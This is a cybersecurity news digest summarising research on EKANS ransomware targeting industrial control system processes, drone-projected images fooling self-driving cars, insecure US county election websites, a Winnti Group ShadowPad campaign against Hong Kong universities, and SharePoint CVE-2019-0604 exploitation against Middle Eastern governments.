Ransomware for industrial control systems.
Dragos released a report on the EKANS ransomware discovered in December 2019. EKANS is notable among ransomware strains for its ability to stop certain processes associated with industrial control systems. EKANS was apparently preceded by a new version of the MegaCortex ransomware released in mid-2019, which targeted more than a thousand IT-related processes with a handful of ICS-specific processes thrown in. EKANS targets just sixty-four processes, the majority of which are related to ICS products. All of these ICS-related processes map directly to MegaCortex's list of targets, indicating that EKANS's developers likely pulled their list from MegaCortex.
Dragos emphasizes that EKANS and the new version of MegaCortex represent the first instances of ransomware specifically targeting ICS processes. EKANS targets processes belonging to ICS devices such as GE’s Proficy data historian, GE Fanuc licensing server services, Honeywell’s HMIWeb application, FLEXNet and Sentinel HASP license managers, and ThingWorx Industrial Connectivity Suite. EKANS can't actually manipulate ICS operations, but it can cause a risky loss of visibility into industrial environments.
Researchers at OTORIO also analyzed EKANS (which they refer to as "SNAKE") and concluded that the malware was probably linked to Iranian state-backed threat actors, but Dragos's researchers are extremely skeptical about OTORIO's conclusion, stating that any connection to Iran is "incredibly tenuous based upon available evidence." They believe the malware is more likely the work of "non-state elements pursuing financial gain."
Dragos is more concerned about the trend that EKANS signifies than they are about its ability to disrupt operations. The researchers state that "[w]hile all indications at present show a relatively primitive attack mechanism on control system networks, the specificity of processes listed in a static 'kill list' shows a level of intentionality previously absent from ransomware targeting the industrial space."
An onomastic note: "EKANS" is "SNAKE" spelled backwards, and some researchers have called this particular ransomware by that latter name. Dragos, to avoid confusion with Turla (also known as "Snake") prefers "EKANS."
Autonomous vehicles tricked by projections.
Researchers at Ben-Gurion University of the Negev have found that even the most advanced self-driving cars can be fooled by images projected by drones onto objects near the road, or onto the road itself. For example, by projecting a two-dimensional image of a person or vehicle on the road, they could cause a car to slam on its brakes. More disturbingly, the car could be tricked into seeing fake lane lines and driving into the oncoming traffic lane, or spotting a phony speed limit sign and believing the posted speed is much higher than it actually is. Both Mobileye 630 PRO and the Tesla Model X, HW 2.5 were found to be susceptible to these attacks.
US county websites lack security measures.
A survey by McAfee revealed that most websites belonging to counties in the thirteen swing states for the 2020 US election don't use the .gov domain, and nearly half of these sites lack HTTPS. 83% of county websites in these states don't use .gov validation, allowing threat actors to potentially spoof government sites in order to spread disinformation. This problem is magnified by the fact that many states lack consistent website naming standards, so the URL structure of one county's site might be completely different from another county's site. McAfee emphasizes that "[i]f a malicious foreign actor can spoof government websites, he can send hundreds of thousands of emails to voters and use both those emails and the websites to which they are tied to send voters information on the wrong polling places, phony voter registration processes or requirements (barriers), or other incorrect voting instructions that could suppress, misdirect, or otherwise disrupt a key county’s electorate from voting." Some states seek to establish their own naming convention for their domains, such as www dot co dot [county name] dot [two-letter state abbreviation] dot us. McAfee thinks these are too inconsistent and confusing to serve as a reliable guide to information.
Winnti Group spies on Hong Kong universities.
ESET uncovered a campaign launched by the China-linked Winnti Group against at least two universities in Hong Kong. The group is using a new launcher to deploy a new version of the ShadowPad backdoor on computers at these schools. The launcher appears to be executed by side-loading a malicious DLL that imitates a library used by HP's legitimate printing and scanning software. This DLL decrypts and executes the shellcode to initialize ShadowPad.
This version of ShadowPad contains seventeen modules for different functionalities. Unlike some other versions of the malware, this variant of ShadowPad has a keylogging module which is active by default, indicating that the attackers are intent on stealing information. Since students of these universities played a large role in the Hong Kong protests, it's reasonable to assume that the campaign is focused on gleaning intelligence about the protests' participants.
The names of the universities were hardcoded into both the malware samples and the command-and-control URLs used in the campaign, so the researchers conclude that the attacks are highly targeted. They also identified C&C URLs containing the names of three other Hong Kong universities, suggesting a total of five schools were targeted.
SharePoint vulnerability exploited to access government organizations.
Palo Alto Networks Unit 42 says a threat actor attacked two government organizations in two different Middle Eastern countries by exploiting CVE-2019-0604, a widely-targeted remote code execution vulnerability in Microsoft SharePoint that was patched in early 2019. The attacker installed a number of web shells, including AntSword, on the compromised servers. These shells were then used to obtain credentials with a custom variant of Mimikatz.
The researchers note that the Chinese-linked APT27 (also known as Emissary Panda) exploited CVE-2019-0604 to attack government entities in two Middle Eastern countries in April 2019. Those attacks used the China Chopper web shell, which Unit 42 says is "incredibly similar" to AntSword. However, both web shells are open source, so there isn't enough evidence to conclude that the two campaigns are related.
It's also worth mentioning that Unit 42's Shodan search revealed 28,881 Internet-accessible servers that are apparently still vulnerable to CVE-2019-0604 nearly a year after patches were released. ZDNet says this is partly due to Microsoft's somewhat convoluted patching process: the company released three different patches in February, March, and April 2019, and the vulnerability wasn't fully fixed until the April patch. As a result, many organizations may be under the impression that they've fixed the flaw because they installed the incomplete patches released in February and March.